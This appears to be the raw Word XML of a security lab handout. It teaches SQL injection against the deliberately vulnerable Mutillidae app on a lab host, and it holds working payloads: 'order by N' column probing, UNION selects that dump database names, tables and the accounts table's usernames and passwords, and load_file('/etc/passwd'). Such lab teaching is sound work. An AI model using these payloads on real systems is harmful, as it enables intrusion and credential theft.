    <w:p w14:paraId="208C8B9F" w14:textId="77777777" w:rsidR="00643173" w:rsidRDefault="00643173" w:rsidP="00643173">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD50E54" w14:textId="77777777" w:rsidR="00643173" w:rsidRDefault="00643173" w:rsidP="00A959CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9395DD" w14:textId="77777777" w:rsidR="00643173" w:rsidRPr="00D06342" w:rsidRDefault="00643173" w:rsidP="00D06342">
      <w:pPr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Task 3</w:t>
      </w:r>
      <w:r w:rsidRPr="0043542E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00804360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bypass Authentication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="001C1CAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Using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1C1CAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE927F6" w14:textId="77777777" w:rsidR="00D143E7" w:rsidRDefault="0077037E" w:rsidP="0077037E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00517F09" wp14:editId="518337FD">
            <wp:extent cx="3382749" cy="1860513"/>
            <wp:effectExtent l="152400" t="152400" r="370205" b="3689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18113" cy="187996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AED8B1" w14:textId="77777777" w:rsidR="00643173" w:rsidRDefault="0058093E" w:rsidP="00BD1991">
      <w:pPr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Task 4</w:t>
      </w:r>
      <w:r w:rsidR="00D06342" w:rsidRPr="0043542E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003466F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Find the Number of Columns</w:t>
      </w:r>
      <w:r w:rsidR="00A959CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using </w:t>
      </w:r>
      <w:r w:rsidR="00A959CE" w:rsidRPr="001A0546">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Order by N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BBCD59" w14:textId="77777777" w:rsidR="001B5B62" w:rsidRPr="00BD1991" w:rsidRDefault="00643173" w:rsidP="00BD1991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3207B5D6" wp14:editId="6CD79B32">
            <wp:extent cx="4038279" cy="1971510"/>
            <wp:effectExtent l="152400" t="152400" r="362585" b="35306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0583" t="3323" r="14184" b="20433"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4079560" cy="19916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C1C15F" w14:textId="77777777" w:rsidR="007B574F" w:rsidRDefault="00BD1991" w:rsidP="00BD1991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2669BFCE" wp14:editId="41F01861">
            <wp:extent cx="4075159" cy="1732378"/>
            <wp:effectExtent l="152400" t="152400" r="363855" b="3632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29964" cy="17556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2444E2" w14:textId="77777777" w:rsidR="00265FEC" w:rsidRPr="00265FEC" w:rsidRDefault="00265FEC" w:rsidP="003637C9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265FEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidRPr="001A0546">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>order by N</w:t>
      </w:r>
      <w:r w:rsidRPr="00165FCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00265FEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>to URL</w:t>
      </w:r>
      <w:r w:rsidR="000D394C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, where N is greater to 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873771B" w14:textId="77777777" w:rsidR="00610963" w:rsidRDefault="00D41DD6" w:rsidP="003637C9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i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Note the</w:t>
      </w:r>
      <w:r w:rsidR="003637C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> original</w:t>
      </w:r>
      <w:r w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL contains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> username=</w:t>
      </w:r>
      <w:r w:rsidR="00610963" w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">frank </w:t>
      </w:r>
      <w:r w:rsidR="00610963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>and password=12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD1AF5" w14:textId="77777777" w:rsidR="00610963" w:rsidRDefault="004919BF" w:rsidP="00AC3D2E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i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>frank</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC3D2E" w:rsidRPr="00AC3D2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>frank'</w:t>
      </w:r>
      <w:r w:rsidR="00610963" w:rsidRPr="0081564B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEFDBCE" w14:textId="77777777" w:rsidR="004919BF" w:rsidRPr="003637C9" w:rsidRDefault="004919BF" w:rsidP="003637C9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i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC624B" w:rsidRPr="0081564B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>frank</w:t>
      </w:r>
      <w:r w:rsidR="00AC3D2E" w:rsidRPr="00AC3D2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00FC624B" w:rsidRPr="0081564B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 1# </w:t>
      </w:r>
      <w:r w:rsidR="00FC624B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>frank</w:t>
      </w:r>
      <w:r w:rsidR="00AC3D2E" w:rsidRPr="00AC3D2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0081564B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>%23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD04D86" w14:textId="77777777" w:rsidR="00265FEC" w:rsidRDefault="00265FEC" w:rsidP="00265FEC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The new URL: </w:t>
      </w:r>
      <w:r w:rsidRPr="003637C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>http://10.0.2.10/mutillidae/index.php?page=user-info.php&amp;username=</w:t>
      </w:r>
      <w:r w:rsidRPr="003637C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>frank</w:t>
      </w:r>
      <w:r w:rsidR="00AC3D2E" w:rsidRPr="00AC3D2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="004919BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0081564B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>%23</w:t>
      </w:r>
      <w:r w:rsidRPr="003637C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>&amp;password=12345&amp;user-info-php-submit-button=View+Account+Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213ABF6F" w14:textId="77777777" w:rsidR="001A1888" w:rsidRDefault="001A1888" w:rsidP="00265FEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00686EE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Change the number 1 to a different number and submit the new link</w:t>
      </w:r>
      <w:r w:rsidR="00AC3D2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> until you see an error message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CED02D" w14:textId="79FA6123" w:rsidR="00AC3D2E" w:rsidRDefault="00AC3D2E" w:rsidP="00265FEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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you have seen the error message, you may type the single quote incorrectly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1539CB" w14:textId="77777777" w:rsidR="003637C9" w:rsidRDefault="00AC3D2E" w:rsidP="00AC3D2E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32E41336" wp14:editId="72C1CD84">
            <wp:extent cx="5247976" cy="2426067"/>
            <wp:effectExtent l="152400" t="152400" r="353060" b="3556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6366" cy="24345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570CB8" w14:textId="77777777" w:rsidR="004919BF" w:rsidRPr="00440472" w:rsidRDefault="007F31C8" w:rsidP="00804360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440472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>N is the number of the columns</w:t>
      </w:r>
      <w:r w:rsidR="00522AD0" w:rsidRPr="00440472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00522AD0" w:rsidRPr="00440472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>why</w:t>
      </w:r>
      <w:r w:rsidR="00522AD0" w:rsidRPr="00440472">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458FBEDE" w14:textId="77777777" w:rsidR="007D6519" w:rsidRDefault="00804360" w:rsidP="007D6519">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF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Task 5</w:t>
      </w:r>
      <w:r w:rsidRPr="0043542E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia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Find the </w:t>
      </w:r>
      <w:r w:rsidR="007220D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Database Information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Using </w:t>
      </w:r>
      <w:r w:rsidR="007220D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Union </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A2430" w14:textId="77777777" w:rsidR="007D6519" w:rsidRDefault="00CF7D06" w:rsidP="007D6519">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF62510" wp14:editId="70F87DB3">
            <wp:extent cx="5943600" cy="763905"/>
            <wp:effectExtent l="152400" t="152400" r="361950" b="3600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39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6B2199" w14:textId="77777777" w:rsidR="008E018A" w:rsidRPr="00613CAB" w:rsidRDefault="008E018A" w:rsidP="007220D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613CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Replacing the highlighted string with the following strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4D474" w14:textId="77777777" w:rsidR="007220D5" w:rsidRPr="00E62DA3" w:rsidRDefault="007220D5" w:rsidP="008E018A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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>union select 1, 2, 3, 4, 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587593B" w14:textId="043F215C" w:rsidR="007220D5" w:rsidRPr="00E62DA3" w:rsidRDefault="007220D5" w:rsidP="008E018A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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>union select 1, database(), user(), version</w:t>
      </w:r>
      <w:r w:rsidR="00056B0A" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>, 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24770646" w14:textId="77777777" w:rsidR="00E6402C" w:rsidRPr="00E62DA3" w:rsidRDefault="00E6402C" w:rsidP="008E018A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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>union select 1, table_name, null, null, 5 from information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05387D1B" w14:textId="77777777" w:rsidR="0057571C" w:rsidRPr="00E62DA3" w:rsidRDefault="0057571C" w:rsidP="008E018A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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>union select 1, table_name, null, null, 5</w:t>
      </w:r>
      <w:r w:rsidR="000161F5" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> from</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000161F5" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>information_schema.tables w</w:t>
      </w:r>
      <w:r w:rsidR="009632DC" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="000161F5" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ere table_schema='owasp10'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632427D5" w14:textId="77777777" w:rsidR="00055445" w:rsidRPr="00E62DA3" w:rsidRDefault="00055445" w:rsidP="008E018A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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>union select 1, co</w:t>
      </w:r>
      <w:r w:rsidR="00C507A5" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>lumn</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>_name, null, null, 5 from information_schema.columns where table_name='</w:t>
      </w:r>
      <w:r w:rsidR="00DB5607" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>account</w:t>
      </w:r>
      <w:r w:rsidR="00613D0C" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D190AF7" w14:textId="77777777" w:rsidR="00C507A5" w:rsidRPr="00E62DA3" w:rsidRDefault="00C507A5" w:rsidP="008E018A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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>union select 1, username, password, is_admin, 5 from accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C697D9" w14:textId="77777777" w:rsidR="003466F2" w:rsidRPr="008E018A" w:rsidRDefault="00590ECB" w:rsidP="008E018A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590ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Write down your observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC2BE3" w14:textId="77777777" w:rsidR="008E018A" w:rsidRDefault="008E018A" w:rsidP="008E018A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF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Task 6</w:t>
      </w:r>
      <w:r w:rsidRPr="0043542E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia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Reading and Writing Any File on the Server Using </w:t>
      </w:r>
      <w:r w:rsidR="00E669BC" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nion</w:t>
      </w:r>
      <w:r w:rsidR="00E669BC" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E669BC" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>load_file and outfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEC64F3" w14:textId="77777777" w:rsidR="00613CAB" w:rsidRDefault="00613CAB" w:rsidP="00613CAB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613CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Replacing the highlighted string with the following strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E9B50A" w14:textId="77777777" w:rsidR="008E018A" w:rsidRPr="00E62DA3" w:rsidRDefault="008E018A" w:rsidP="00613CAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19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  <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">union </w:t>
      </w:r>
      <w:r w:rsidR="00613CAB" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
        </w:rPr>
        <w:t>select null</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00613CAB" w:rsidRPr="00E62DA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
        </w:rPr>
        <w:t>load_file('/etc/passwd')</w:t>
      </w:r>
      <w:r w:rsidRPr="00E62DA3">
        <w:rPr>
